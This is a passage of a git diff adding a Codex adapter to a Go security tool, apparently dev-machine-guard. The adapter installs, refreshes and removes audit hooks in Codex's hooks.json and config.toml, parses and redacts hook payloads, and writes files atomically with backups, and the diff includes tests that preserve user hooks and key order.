relocates the binary in the +// Cellar) would silently break hooks. +func TestInstallRefreshesStaleBinaryPath(t *testing.T) { + stalePath := "/old/path/stepsecurity-dev-machine-guard" + body := `{"hooks":{"PreToolUse":[{"matcher":"*","hooks":[{"type":"command","command":"` + stalePath + ` _hook codex PreToolUse","timeout":30,"statusMessage":"old"}]}]}}` + a, _, hooks, _ := withCodexFiles(t, body, "") + if _, err := a.Install(context.Background()); err != nil { + t.Fatal(err) + } + out, _ := os.ReadFile(hooks) + if strings.Contains(string(out), stalePath) { + t.Errorf("stale binary path not refreshed: %s", out) + } + if !strings.Contains(string(out), testBinary) { + t.Errorf("new binary path not written: %s", out) + } +} + +// rootKeyOrder returns the top-level JSON object keys of path in +// source order. +func rootKeyOrder(t *testing.T, path string) []string { + t.Helper() + b, err := os.ReadFile(path) + if err != nil { + t.Fatal(err) + } + dec := json.NewDecoder(strings.NewReader(string(b))) + tok, err := dec.Token() + if err != nil || tok != json.Delim('{') { + t.Fatalf("expected root '{', got %v err %v", tok, err) + } + var keys []string + for dec.More() { + k, err := dec.Token() + if err != nil { + t.Fatal(err) + } + keys = append(keys, k.(string)) + var raw json.RawMessage + if err := dec.Decode(&raw); err != nil { + t.Fatal(err) + } + } + return keys +} + +func TestInstallPreservesHooksJSONKeyOrder(t *testing.T) { + a, _, hooks, _ := withCodexFiles(t, `{ + "z": "last", + "hooks": { + "PreToolUse": [ + {"matcher": "Bash", "hooks": [{"timeout": 5, "type": "command", "command": "echo user"}]} + ] + }, + "a": "first" + }`, "") + if _, err := a.Install(context.Background()); err != nil { + t.Fatal(err) + } + if got, want := rootKeyOrder(t, hooks), []string{"z", "hooks", "a"}; !slices.Equal(got, want) { + t.Errorf("root key order: got %v, want %v", got, want) + } + b, _ := os.ReadFile(hooks) + out := string(b) + userIdx := strings.Index(out, `"echo user"`) + if userIdx < 0 { + t.Fatalf("user hook not found in output: %s", out) + } + entryStart := strings.LastIndex(out[:userIdx], "{") + entryEnd := strings.Index(out[userIdx:], "}") + entry := out[entryStart : userIdx+entryEnd+1] + tIdx := strings.Index(entry, `"timeout"`) + yIdx := strings.Index(entry, `"type"`) + cIdx := strings.Index(entry, `"command"`) + if !(tIdx >= 0 && tIdx < yIdx && yIdx < cIdx) { + t.Errorf("user hook key order lost; entry: %s", entry) + } +} + +func TestInstallPreservesConfigTOMLBytes(t *testing.T) { + a, _, _, cfg := withCodexFiles(t, "", `# user header comment +model = "gpt-5" + +[features] +sandbox = "workspace-write" + +[telemetry] +enabled = true +`) + if _, err := a.Install(context.Background()); err != nil { + t.Fatal(err) + } + got, _ := os.ReadFile(cfg) + s := string(got) + for _, want := range []string{ + "# user header comment", + `model = "gpt-5"`, + `sandbox = "workspace-write"`, + "[telemetry]", + "enabled = true", + "codex_hooks = true", + } { + if !strings.Contains(s, want) { + t.Errorf("expected %q in output; got: %s", want, s) + } + } + // Order: telemetry must still come AFTER features (which now contains codex_hooks). + featIdx := strings.Index(s, "[features]") + telIdx := strings.Index(s, "[telemetry]") + chIdx := strings.Index(s, "codex_hooks") + if !(featIdx < chIdx && chIdx < telIdx) { + t.Errorf("table order disturbed: %s", s) + } +} + +// TestInstallSecondInstallIsByteStableNoOp: the codex hooks.json +// install path skips backup + write entirely when the file is already +// in desired state. +func TestInstallSecondInstallIsByteStableNoOp(t *testing.T) { + a, _, hooks, _ := newCodexHome(t) + if _, err := a.Install(context.Background()); err != nil { + t.Fatal(err) + } + before, _ := os.ReadFile(hooks) + matches, _ := filepath.Glob(hooks + ".dmg-*.bak") + beforeBackups := len(matches) + res, err := a.Install(context.Background()) + if err != nil { + t.Fatal(err) + } + after, _ := os.ReadFile(hooks) + if !bytes.Equal(before, after) { + t.Errorf("idempotent install rewrote hooks.json") + } + matches, _ = filepath.Glob(hooks + ".dmg-*.bak") + if len(matches) != beforeBackups { + t.Errorf("idempotent install created a new backup: %v", matches) + } + if slices.Contains(res.WrittenFiles, hooks) { + t.Errorf("expected hooks.json absent from WrittenFiles on no-op install, got %v", res.WrittenFiles) + } +} + +func TestInstallNoOpDoesNotRewriteConfigTOML(t *testing.T) { + a, _, _, cfg := withCodexFiles(t, "", `[features] +codex_hooks = true +sandbox = "workspace-write" +`) + original, _ := os.ReadFile(cfg) + if _, err := a.Install(context.Background()); err != nil { + t.Fatal(err) + } + got, _ := os.ReadFile(cfg) + if string(got) != string(original) { + t.Errorf("config.toml byte-mutated despite already-enabled flag:\n pre %s\n post %s", original, got) + } + matches, _ := filepath.Glob(cfg + ".dmg-*.bak") + if len(matches) > 0 { + t.Errorf("unexpected backup created: %v", matches) + } +} + +// TestInstallCreatesParentDirWhenAbsent asserts that Install can run +// against a fresh home without ~/.codex/ existing — the atomicfile +// layer creates parent dirs and reports them in CreatedDirs so the +// install handler can chown them under root. +func TestInstallCreatesParentDirWhenAbsent(t *testing.T) { + a, home, _, _ := newCodexHome(t) + res, err := a.Install(context.Background()) + if err != nil { + t.Fatalf("Install: %v", err) + } + codexDir := filepath.Join(home, ".codex") + if _, statErr := os.Stat(codexDir); statErr != nil { + t.Errorf("~/.codex/ not created: %v", statErr) + } + if !slices.Contains(res.CreatedDirs, codexDir) { + t.Errorf("CreatedDirs missing %q: got %v", codexDir, res.CreatedDirs) + } +} + +// ---------- Uninstall ---------- + +func TestUninstallLeavesUnrelatedHooks(t *testing.T) { + body := `{ + "hooks": { + "PreToolUse": [ + {"matcher": "*", "hooks": [ + {"type": "command", "command": "stepsecurity-dev-machine-guardctl status"}, + {"type": "command", "command": "/usr/local/bin/other-tool _hook claude-code PreToolUse"}, + {"type": "command", "command": "echo user"} + ]} + ] + } + }` + a, _, hooks, _ := withCodexFiles(t, body, "") + if _, err := a.Install(context.Background()); err != nil { + t.Fatal(err) + } + res, err := a.Uninstall(context.Background()) + if err != nil { + t.Fatal(err) + } + if len(res.HooksRemoved) == 0 { + t.Fatal("expected at least one hook removed") + } + got := readJSON(t, hooks) + hooksMap, _ := got["hooks"].(map[string]any) + if hooksMap == nil { + t.Fatal("hooks key removed despite remaining user entries") + } + pre := hooksMap["PreToolUse"].([]any) + survivors := []string{} + for _, raw := range pre { + group := raw.(map[string]any) + for _, h := range group["hooks"].([]any) { + hm := h.(map[string]any) + cmd := hm["command"].(string) + survivors = append(survivors, cmd) + if isManagedCommand(cmd) { + t.Errorf("managed command survived uninstall: %q", cmd) + } + } + } + for _, want := range []string{ + "stepsecurity-dev-machine-guardctl status", + "/usr/local/bin/other-tool _hook claude-code PreToolUse", + "echo user", + } { + if !slices.Contains(survivors, want) { + t.Errorf("user/lookalike hook %q removed; survivors=%v", want, survivors) + } + } + noteSeen := false + for _, n := range res.Notes { + if strings.Contains(n, "feature flag") { + noteSeen = true + } + } + if !noteSeen { + t.Errorf("expected feature-flag note: %v", res.Notes) + } +} + +// TestUninstallPreservesUserHookAfterManagedEntry covers the +// array-shift bug fixed by the gjson/sjson refactor — the previous +// span-based renderer matched array elements by index, so removing +// the managed entry at index 0 could overwrite the user entry that +// shifted into index 0. +func TestUninstallPreservesUserHookAfterManagedEntry(t *testing.T) { + body := `{"hooks":{"PreToolUse":[{"matcher":"*","hooks":[{"type":"command","command":"` + commandFor(HookPreToolUse) + `","timeout":30,"statusMessage":"dev-machine-guard: checking tool use"},{"timeout":5,"type":"command","command":"echo user"}]}]}}` + a, _, hooks, _ := withCodexFiles(t, body, "") + if _, err := a.Uninstall(context.Background()); err != nil { + t.Fatal(err) + } + out, _ := os.ReadFile(hooks) + if !strings.Contains(string(out), `"command": "echo user"`) { + t.Fatalf("user hook after managed entry was lost: %s", out) + } + if isManagedCommand(string(out)) && strings.Contains(string(out), commandFor(HookPreToolUse)) { + t.Fatalf("managed entry survived uninstall: %s", out) + } +} + +func TestUninstallPreservesHooksJSONUserKeyOrder(t *testing.T) { + a, _, hooks, _ := withCodexFiles(t, `{ + "hooks": { + "PreToolUse": [ + {"matcher": "Bash", "hooks": [{"timeout": 5, "type": "command", "command": "echo user"}]} + ] + } + }`, "") + if _, err := a.Install(context.Background()); err != nil { + t.Fatal(err) + } + if _, err := a.Uninstall(context.Background()); err != nil { + t.Fatal(err) + } + b, _ := os.ReadFile(hooks) + out := string(b) + if !strings.Contains(out, "echo user") { + t.Fatalf("user hook lost on uninstall: %s", out) + } + userIdx := strings.Index(out, `"echo user"`) + entryStart := strings.LastIndex(out[:userIdx], "{") + entryEnd := strings.Index(out[userIdx:], "}") + entry := out[entryStart : userIdx+entryEnd+1] + tIdx := strings.Index(entry, `"timeout"`) + yIdx := strings.Index(entry, `"type"`) + cIdx := strings.Index(entry, `"command"`) + if !(tIdx >= 0 && tIdx < yIdx && yIdx < cIdx) { + t.Errorf("user hook key order lost on uninstall; entry: %s", entry) + } +} + +func TestUninstallLeavesFeatureFlagEnabled(t *testing.T) { + // Uninstall must NOT revert `[features].codex_hooks = true`. Other + // tools may have wired up their own hooks that depend on it being on. + a, _, _, cfg := newCodexHome(t) + if _, err := a.Install(context.Background()); err != nil { + t.Fatal(err) + } + if _, err := a.Uninstall(context.Background()); err != nil { + t.Fatal(err) + } + cfgMap := readTOML(t, cfg) + features, ok := cfgMap["features"].(map[string]any) + if !ok { + t.Fatalf("features table missing after uninstall: %v", cfgMap) + } + if features["codex_hooks"] != true { + t.Errorf("codex_hooks was reverted on uninstall: %v", features) + } +} diff --git a/internal/aiagents/adapter/codex/hooks.go b/internal/aiagents/adapter/codex/hooks.go new file mode 100644 index 0000000..489540c --- /dev/null +++ b/internal/aiagents/adapter/codex/hooks.go @@ -0,0 +1,58 @@ +package codex + +import "github.com/step-security/dev-machine-guard/internal/aiagents/event" + +// Codex-native hook event names. These are kept in this package and +// NOT promoted to internal/aiagents/event so cross-agent code (policy, +// runtime) cannot branch on them — branching MUST go through +// event.HookPhase instead. +const ( + HookSessionStart event.HookEvent = "SessionStart" + HookPreToolUse event.HookEvent = "PreToolUse" + HookPermissionRequest event.HookEvent = "PermissionRequest" + HookPostToolUse event.HookEvent = "PostToolUse" + HookUserPromptSubmit event.HookEvent = "UserPromptSubmit" + HookStop event.HookEvent = "Stop" +) + +// supportedHookEvents is the install order. Append-only — order is +// significant for install/uninstall reproducibility and shows up in +// user-facing diagnostics. +var supportedHookEvents = []event.HookEvent{ + HookSessionStart, + HookPreToolUse, + HookPermissionRequest, + HookPostToolUse, + HookUserPromptSubmit, + HookStop, +} + +// SupportedHooks returns a fresh copy of the Codex-supported hook list. +// Callers may freely mutate the returned slice without affecting +// adapter internals. +func (a *Adapter) SupportedHooks() []event.HookEvent { + out := make([]event.HookEvent, len(supportedHookEvents)) + copy(out, supportedHookEvents) + return out +} + +// phaseFor maps a Codex native hook event onto the normalized hook +// phase. Cross-agent consumers (policy, filtering) branch on phase; +// adapter-specific consumers may still inspect HookEvent. +func phaseFor(h event.HookEvent) event.HookPhase { + switch h { + case HookSessionStart: + return event.HookPhaseSessionStart + case HookPreToolUse: + return event.HookPhasePreTool + case HookPermissionRequest: + return event.HookPhasePermissionRequest + case HookPostToolUse: + return event.HookPhasePostTool + case HookUserPromptSubmit: + return event.HookPhaseUserPrompt + case HookStop: + return event.HookPhaseStop + } + return event.HookPhaseUnknown +} diff --git a/internal/aiagents/adapter/codex/parse.go b/internal/aiagents/adapter/codex/parse.go new file mode 100644 index 0000000..0fcf18d --- /dev/null +++ b/internal/aiagents/adapter/codex/parse.go @@ -0,0 +1,161 @@ +package codex + +import ( + "context" + "encoding/json" + "fmt" + "strings" + "time" + + "github.com/step-security/dev-machine-guard/internal/aiagents/event" + "github.com/step-security/dev-machine-guard/internal/aiagents/redact" +) + +// ParseEvent normalizes a Codex hook stdin payload into a DMG event. +// The raw payload is REDACTED before being attached to the result; +// the original bytes never appear in the returned event. +func (a *Adapter) ParseEvent(ctx context.Context, hookType event.HookEvent, raw []byte) (*event.Event, error) { + var generic map[string]any + if err := json.Unmarshal(raw, &generic); err != nil { + return nil, fmt.Errorf("codex parse: %w", err) + } + if generic == nil { + generic = map[string]any{} + } + + ev := &event.Event{ + SchemaVersion: event.SchemaVersion, + EventID: event.NewEventID(), + Timestamp: time.Now().UTC(), + AgentName: AgentName, + HookEvent: hookType, + HookPhase: phaseFor(hookType), + ResultStatus: event.ResultObserved, + } + + ev.SessionID = stringField(generic, "session_id") + ev.WorkingDirectory = stringField(generic, "cwd") + ev.PermissionMode = stringField(generic, "permission_mode") + ev.ToolName = stringField(generic, "tool_name") + ev.ToolUseID = stringField(generic, "tool_use_id") + + // Cross-check: the CLI arg names which hook command Codex + // invoked. On disagreement, keep runtime behavior tied to that + // hook and record the payload mismatch for audit. The payload + // claim is not persisted as a field of its own — ev.HookEvent is + // the single source of truth. + if claimed := stringField(generic, "hook_event_name"); claimed != "" && claimed != string(hookType) { + ev.Errors = append(ev.Errors, event.ErrorInfo{ + Stage: "parse", + Code: "hook_event_name_mismatch", + Message: "cli arg=" + string(hookType) + " payload=" + claimed, + }) + } + + ev.ActionType = inferActionType(ev.HookEvent, ev.ToolName) + + // Codex has no separate documented failure hook; PostToolUse + // means the tool completed. Treat it as success unless future + // Codex versions expose a richer status field. + if ev.HookPhase == event.HookPhasePostTool { + ev.ResultStatus = event.ResultSuccess + } + + cleaned := scrubPayload(generic) + if v, ok := redact.Value(cleaned).(map[string]any); ok { + ev.Payload = v + } else { + ev.Payload = cleaned + } + + ev.IsSensitive = isSensitivePayload(generic) + + return ev, nil +} + +// scrubPayload swaps bulky / sensitive fields for presence markers +// but preserves audit-evidence fields (prompt, transcript_path, +// source). +func scrubPayload(p map[string]any) map[string]any { + out := make(map[string]any, len(p)) + for k, v := range p { + switch strings.ToLower(k) { + case "transcript", "messages", "stdout", "stderr", "content": + out[k+"_present"] = true + case "last_assistant_message": + out["last_assistant_message_present"] = true + default: + out[k] = v + } + } + return out +} + +// inferActionType is only meaningful for PreToolUse and PostToolUse. +// PermissionRequest, SessionStart, UserPromptSubmit, and Stop leave +// the field empty — the hook_event field already names the lifecycle +// phase, and permission events describe a decision around a tool call +// rather than a tool call itself. +func inferActionType(hookEvent event.HookEvent, toolName string) event.ActionType { + switch hookEvent { + case HookPreToolUse, HookPostToolUse: + default: + return "" + } + switch { + case toolName == "Bash": + return event.ActionCommandExec + case toolName == "apply_patch": + return event.ActionFileWrite + case strings.HasPrefix(toolName, "mcp__"): + return event.ActionMCPInvocation + case toolName == "": + return "" + default: + return event.ActionToolUse + } +} + +// ShellCommand extracts the redacted shell command from a parsed +// Codex event. Returns ok=false for everything except `Bash`. +// apply_patch's tool_input.command is a patch payload, not shell +// input. +func (a *Adapter) ShellCommand(ev *event.Event) (cmd string, cwd string, ok bool) { + if ev == nil || ev.Payload == nil { + return "", "", false + } + if ev.ToolName != "Bash" { + return "", ev.WorkingDirectory, false + } + ti, _ := ev.Payload["tool_input"].(map[string]any) + if ti == nil { + return "", ev.WorkingDirectory, false + } + c, _ := ti["command"].(string) + if c == "" { + return "", ev.WorkingDirectory, false + } + wd, _ := ti["cwd"].(string) + if wd == "" { + wd = ev.WorkingDirectory + } + return c, wd, true +} + +func isSensitivePayload(p map[string]any) bool { + ti, ok := p["tool_input"].(map[string]any) + if !ok { + return false + } + for _, key := range []string{"file_path", "path", "filename"} { + if v, ok := ti[key].(string); ok && redact.IsSensitivePath(v) { + return true + } + } + return false +} + +func stringField(m map[string]any, k string) string { + v, _ := m[k].(string) + return v +} diff --git a/internal/aiagents/adapter/codex/settings.go b/internal/aiagents/adapter/codex/settings.go new file mode 100644 index 0000000..1a8f683 --- /dev/null +++ b/internal/aiagents/adapter/codex/settings.go @@ -0,0 +1,456 @@ +package codex + +import ( + "bytes" + "encoding/json" + "errors" + "fmt" + "io/fs" + "os" + "regexp" + "slices" + + toml "github.com/pelletier/go-toml/v2" + "github.com/tidwall/gjson" + "github.com/tidwall/pretty" + "github.com/tidwall/sjson" + + "github.com/step-security/dev-machine-guard/internal/aiagents/atomicfile" + "github.com/step-security/dev-machine-guard/internal/aiagents/configedit" + "github.com/step-security/dev-machine-guard/internal/aiagents/event" +) + +const ( + hookTimeoutSeconds = 30 + matcherAll = "*" + matcherSession = "startup|resume|clear" + settingsMode = os.FileMode(0o600) + statusMessagePrefix = "dev-machine-guard" +) + +// managedCmdRE is the uninstall match criterion. It matches an entry's +// `command` field when the executable token is the DMG binary, +// regardless of which absolute path it sits behind. The `(^|/)` +// left-side accepts both bare invocations and absolute-path +// invocations, while rejecting prefix collisions like +// `mystepsecurity-dev-machine-guard`. +// +// The regex is kept identical to the claudecode adapter's so a single +// grep covers both. +var managedCmdRE = regexp.MustCompile(`(^|/)stepsecurity-dev-machine-guard\s+_hook\s+`) + +// hooksDoc holds raw bytes for ~/.codex/hooks.json. orig is the bytes +// as read from disk (nil if the file did not exist); json is the +// in-memory mutation buffer that starts equal to orig (or `{}` when +// the file is missing/empty). All edits go through tidwall/sjson so +// unrelated user formatting is preserved byte-for-byte. +type hooksDoc struct { + orig []byte + json []byte +} + +func loadHooksDoc(path string) (*hooksDoc, error) { + b, err := os.ReadFile(path) + if err != nil { + if errors.Is(err, fs.ErrNotExist) { + return &hooksDoc{json: []byte(`{}`)}, nil + } + return nil, fmt.Errorf("codex hooks read: %w", err) + } + normalized, err := configedit.NormalizeJSONObject(b) + if err != nil { + return nil, fmt.Errorf("codex hooks parse: %w", err) + } + return &hooksDoc{orig: b, json: normalized}, nil +} + +func hookEventPath(hookType event.HookEvent) string { + return configedit.Path("hooks", string(hookType)) +} + +func statusMessageFor(hookType event.HookEvent) string { + switch hookType { + case HookSessionStart: + return statusMessagePrefix + ": recording Codex session" + case HookPreToolUse: + return statusMessagePrefix + ": checking tool use" + case HookPermissionRequest: + return statusMessagePrefix + ": checking approval request" + case HookPostToolUse: + return statusMessagePrefix + ": recording tool result" + case HookUserPromptSubmit: + return statusMessagePrefix + ": recording prompt" + case HookStop: + return statusMessagePrefix + ": recording turn stop" + } + return statusMessagePrefix +} + +// matcherFor returns the matcher for a hook event, or "" when the +// matcher key should be omitted entirely from the matcher group. +// Codex is more particular than Claude Code about matchers — only +// SessionStart and the tool-use family carry one. +func matcherFor(hookType event.HookEvent) string { + switch hookType { + case HookSessionStart: + return matcherSession + case HookPreToolUse, HookPermissionRequest, HookPostToolUse: + return matcherAll + } + return "" +} + +// codexHookEntry is the inner record shape Codex expects. DMG entries +// are identified on uninstall by `managedCmdRE` matching the command +// field, not by a metadata marker. +type codexHookEntry struct { + Type string `json:"type"` + Command string `json:"command"` + Timeout int `json:"timeout"` + StatusMessage string `json:"statusMessage"` +} + +func desiredHookEntry(hookType event.HookEvent, command string) codexHookEntry { + return codexHookEntry{ + Type: "command", + Command: command, + Timeout: hookTimeoutSeconds, + StatusMessage: statusMessageFor(hookType), + } +} + +// isManagedCommand reports whether cmd is a DMG-installed hook entry. +// Hook entries from other tools are intentionally not matched. +func isManagedCommand(cmd string) bool { + return managedCmdRE.MatchString(cmd) +} + +// upsertHook ensures exactly one DMG entry exists for hookType under +// the desired matcher, preserving every unrelated user matcher and +// inner hook. DMG entries under any other matcher are dropped (and +// recreated under the desired matcher) so audit coverage always +// tracks the install desired state. +// +// command is the literal string to write into the entry's `command` +// field — the adapter computes it via a.commandFor(hookType) so the +// settings document never embeds the binary path resolution logic. +// +// Always-refresh: when a managed entry already sits under the desired +// matcher, its type/command/timeout/statusMessage fields are rewritten +// in place via sjson (preserving any extra keys the user added). This +// self-heals the binary-move case — matching the claudecode adapter's +// behavior at zero extra cost. +func (d *hooksDoc) upsertHook(hookType event.HookEvent, command string) (added bool) { + want := desiredHookEntry(hookType, command) + wantMatcher := matcherFor(hookType) + wantRaw, err := configedit.MarshalRawJSON(want) + if err != nil { + return false + } + path := hookEventPath(hookType) + list := gjson.GetBytes(d.json, path).Array() + + outGroups := make([]string, 0, len(list)+1) + placed := false + listChanged := false + + for _, group := range list { + if !group.IsObject() { + outGroups = append(outGroups, group.Raw) + continue + } + matcher := group.Get("matcher").String() + inner := group.Get("hooks").Array() + + filtered := make([]string, 0, len(inner)+1) + groupChanged := false + for _, h := range inner { + if !h.IsObject() { + filtered = append(filtered, h.Raw) + continue + } + cmd := h.Get("command").String() + if !isManagedCommand(cmd) { + filtered = append(filtered, h.Raw) + continue + } + // Managed entry. Refresh + keep ONLY when this group's + // matcher matches the desired matcher and we have not yet + // placed one; otherwise drop so the desired-matcher group + // receives it. + if matcher == wantMatcher && !placed { + refreshed, err := refreshManagedEntry(h.Raw, want) + if err != nil { + return false + } + if refreshed != h.Raw { + groupChanged = true + } + filtered = append(filtered, refreshed) + placed = true + continue + } + // drop: stale matcher or duplicate. + groupChanged = true + } + // If this group has the desired matcher and we still need to + // place the managed entry, insert it here so we don't append a + // new group for a matcher that already exists. + if matcher == wantMatcher && !placed { + filtered = append(filtered, wantRaw) + placed = true + groupChanged = true + } + if len(filtered) == 0 { + listChanged = true + continue + } + if !groupChanged { + outGroups = append(outGroups, group.Raw) + continue + } + updated, err := sjson.SetRawBytes([]byte(group.Raw), "hooks", []byte(configedit.RawArray(filtered))) + if err != nil { + return false + } + outGroups = append(outGroups, string(updated)) + listChanged = true + } + + if !placed { + groupRaw, err := newGroupRaw(wantMatcher, wantRaw) + if err != nil { + return false + } + outGroups = append(outGroups, groupRaw) + added = true + listChanged = true + } + + if !listChanged { + return added + } + + patched, err := configedit.SetRaw(d.json, path, configedit.RawArray(outGroups)) + if err != nil { + return false + } + d.json = patched + return added +} + +// newGroupRaw builds the matcher-group JSON: with `matcher` when +// wantMatcher is non-empty, omitting it otherwise. +func newGroupRaw(wantMatcher, hookRaw string) (string, error) { + if wantMatcher == "" { + group := struct { + Hooks []json.RawMessage `json:"hooks"` + }{Hooks: []json.RawMessage{json.RawMessage(hookRaw)}} + return configedit.MarshalRawJSON(group) + } + group := struct { + Matcher string `json:"matcher"` + Hooks []json.RawMessage `json:"hooks"` + }{Matcher: wantMatcher, Hooks: []json.RawMessage{json.RawMessage(hookRaw)}} + return configedit.MarshalRawJSON(group) +} + +// refreshManagedEntry rewrites type, command, timeout, and +// statusMessage on an existing DMG hook entry while preserving every +// other key the user might have added. Used so that a `hooks install` +// re-run after the binary path changes (e.g. `brew upgrade` relocated +// it) updates the absolute path in-place rather than leaving a stale +// entry behind. +func refreshManagedEntry(rawEntry string, want codexHookEntry) (string, error) { + out := []byte(rawEntry) + var err error + out, err = sjson.SetBytes(out, "type", want.Type) + if err != nil { + return "", err + } + out, err = sjson.SetBytes(out, "command", want.Command) + if err != nil { + return "", err + } + out, err = sjson.SetBytes(out, "timeout", want.Timeout) + if err != nil { + return "", err + } + out, err = sjson.SetBytes(out, "statusMessage", want.StatusMessage) + if err != nil { + return "", err + } + return string(out), nil +} + +// removeManagedHooks strips every DMG-owned entry (regex match on +// managedCmdRE). Returns the hook events from which at least one entry +// was removed. binaryPath is reserved for future scoping (e.g., +// "remove only entries pointing at this specific binary"); today we +// remove any entry whose command matches managedCmdRE, regardless of +// the path token. +func (d *hooksDoc) removeManagedHooks(binaryPath string) []event.HookEvent { + _ = binaryPath + var removed []event.HookEvent + hooksRoot := gjson.GetBytes(d.json, "hooks") + if !hooksRoot.IsObject() { + return nil + } + + type hookKeyEntry struct { + key string + list []gjson.Result + } + var events []hookKeyEntry + hooksRoot.ForEach(func(k, v gjson.Result) bool { + if v.IsArray() { + events = append(events, hookKeyEntry{key: k.String(), list: v.Array()}) + } + return true + }) + + for _, ev := range events { + outGroups := make([]string, 0, len(ev.list)) + didRemove := false + for _, group := range ev.list { + if !group.IsObject() { + outGroups = append(outGroups, group.Raw) + continue + } + inner := group.Get("hooks").Array() + filtered := make([]string, 0, len(inner)) + groupChanged := false + for _, h := range inner { + if h.IsObject() && isManagedCommand(h.Get("command").String()) { + didRemove = true + groupChanged = true + continue + } + filtered = append(filtered, h.Raw) + } + if len(filtered) == 0 { + continue + } + if !groupChanged { + outGroups = append(outGroups, group.Raw) + continue + } + updated, err := sjson.SetRawBytes([]byte(group.Raw), "hooks", []byte(configedit.RawArray(filtered))) + if err != nil { + return nil + } + outGroups = append(outGroups, string(updated)) + } + if didRemove { + removed = append(removed, event.HookEvent(ev.key)) + } + if !didRemove { + continue + } + path := configedit.Path("hooks", ev.key) + if len(outGroups) == 0 { + next, err := configedit.Delete(d.json, path) + if err != nil { + return nil + } + d.json = next + continue + } + next, err := configedit.SetRaw(d.json, path, configedit.RawArray(outGroups)) + if err != nil { + return nil + } + d.json = next + } + + if hooks := gjson.GetBytes(d.json, "hooks"); hooks.IsObject() { + empty := true + hooks.ForEach(func(k, v gjson.Result) bool { + empty = false + return false + }) + if empty { + next, err := configedit.Delete(d.json, "hooks") + if err == nil { + d.json = next + } + } + } + + slices.SortFunc(removed, func(a, b event.HookEvent) int { + switch { + case a < b: + return -1 + case a > b: + return 1 + } + return 0 + }) + return removed +} + +// writeHooksAtomic installs doc.json through atomicfile. When the +// upsert pipeline produced no structural change, doc.json is +// byte-identical to doc.orig and the call is a complete no-op (no +// backup, no write, returns nil result). Otherwise the entire file is +// pretty-printed with 2-space indent so the result is human-readable. +func writeHooksAtomic(path string, doc *hooksDoc) (*atomicfile.WriteResult, error) { + if !json.Valid(doc.json) { + return nil, fmt.Errorf("codex hooks: invalid JSON after edit") + } + if bytes.Equal(doc.json, doc.orig) { + return nil, nil + } + out := pretty.PrettyOptions(doc.json, &pretty.Options{Indent: " ", Width: 80}) + if bytes.Equal(out, doc.orig) { + return nil, nil + } + mode := atomicfile.PickMode(path, settingsMode) + wr, err := atomicfile.WriteAtomic(path, out, mode) + if err != nil { + return nil, err + } + return &wr, nil +} + +// loadConfigTOMLBytes reads ~/.codex/config.toml and returns the raw +// bytes. We do NOT round-trip through go-toml's marshaller for writes +// because that reorders keys and discards comments. Callers patch the +// bytes via configedit.EnsureCodexHooksFlag. +// +// Missing files return (nil, nil). Malformed TOML is rejected here so +// install can abort BEFORE hooks.json is touched (multi-file safety; +// see TestInstallMalformedTOMLDoesNotMutateHooks). +func loadConfigTOMLBytes(path string) ([]byte, error) { + b, err := os.ReadFile(path) + if err != nil { + if errors.Is(err, fs.ErrNotExist) { + return nil, nil + } + return nil, fmt.Errorf("codex config read: %w", err) + } + probe := map[string]any{} + if len(bytes.TrimSpace(b)) > 0 { + if err := toml.Unmarshal(b, &probe); err != nil { + return nil, fmt.Errorf("codex config parse: %w", err) + } + } + return b, nil +} + +// writeConfigAtomic installs encoded as the new config.toml contents +// via atomicfile. Returns nil, nil when encoded is byte-identical to +// the existing file (no-op). +func writeConfigAtomic(path string, encoded []byte) (*atomicfile.WriteResult, error) { + existing, err := os.ReadFile(path) + if err == nil && bytes.Equal(existing, encoded) { + return nil, nil + } + mode := atomicfile.PickMode(path, settingsMode) + wr, err := atomicfile.WriteAtomic(path, encoded, mode) + if err != nil { + return nil, err + } + return &wr, nil +} + diff --git a/internal/aiagents/atomicfile/atomicfile.go b/internal/aiagents/atomicfile/atomicfile.go new file mode 100644 index 0000000..cf4f074 --- /dev/null +++ b/internal/aiagents/atomicfile/atomicfile.go @@ -0,0 +1,225 @@ +// Package atomicfile writes files using a temp-file + rename discipline so +// readers never observe a half-written state. +// +// Atomic-write order: create temp in target dir → write → fsync → close → +// chmod → rename. Any existing file at the target is copied to a sibling +// backup (`.dmg-.bak`) before the rename. +// +// Ownership is intentionally NOT this package's concern. Under root +// install, the caller (the install handler) chowns the result to the +// console user — WriteResult exposes every path we wrote or created so +// the caller has the full set without having to walk the filesystem. +// +// The `Restore`, `RestoreOptions`, `RestoreResult`, and `ListBackups` +// operations are omitted — `hooks restore` is not in scope. +package atomicfile + +import ( + "fmt" + "os" + "path/filepath" + "sort" + "time" +) + +// BackupPrefix is the literal between the original path and the timestamp +// on backup files. BackupExt is the trailing extension. Together they +// produce: `.dmg-.bak`. The `.bak` ending is the +// conventional backup marker most editors and gitignore templates already +// recognize; the `dmg-` token identifies the file as ours. +const ( + BackupPrefix = ".dmg-" + BackupExt = ".bak" +) + +// BackupStampLayout is the time.Format layout used in backup filenames. +// UTC is mandatory so backups sort chronologically across timezones. +const BackupStampLayout = "20060102T150405" + +// MaxBackups caps per-target backup retention. After TakeBackup creates +// a new backup, older DMG-owned backups for the same target are deleted +// so at most MaxBackups remain (newest by mtime). Both the current +// `.dmg-.bak` form and the legacy `.dmg-backup.` +// form count toward the same cap so the rotation gradually cleans up +// files left from before the rename. +const MaxBackups = 3 + +// WriteResult reports every path WriteAtomic touched. The install handler +// uses CreatedDirs + Path + BackupPath to chown new files under root. +type WriteResult struct { + Path string // the target file we wrote + BackupPath string // "" when no pre-existing file was backed up + CreatedDirs []string // every parent dir we mkdir'd (deepest last); empty if all parents existed +} + +// PickMode returns the existing file's permission bits, or fallback if the +// file does not exist. Used so reinstalls preserve a user-tightened mode +// instead of clobbering with the default. +func PickMode(path string, fallback os.FileMode) os.FileMode { + info, err := os.Stat(path) + if err != nil { + return fallback.Perm() + } + return info.Mode().Perm() +} + +// TakeBackup copies the existing file at path to a sibling +// `.dmg-.bak`. Returns "" with nil error if the source +// does not exist (the common first-install case). +func TakeBackup(path string, now time.Time) (string, error) { + info, err := os.Stat(path) + if err != nil { + if os.IsNotExist(err) { + return "", nil + } + return "", err + } + if info.IsDir() { + return "", fmt.Errorf("atomicfile: %s is a directory, not a file", path) + } + data, err := os.ReadFile(path) + if err != nil { + return "", err + } + backupPath := path + BackupPrefix + now.UTC().Format(BackupStampLayout) + BackupExt + if err := os.WriteFile(backupPath, data, info.Mode().Perm()); err != nil { + return "", err + } + pruneBackups(path, MaxBackups) + return backupPath, nil +} + +// pruneBackups deletes older DMG-owned backups for path so at most keep +// remain (newest by mtime). Both the current `.dmg-*.bak` form and the +// legacy `.dmg-backup.*` form go in the same pool — the cap holds across +// the rename so legacy files don't linger forever. +// +// 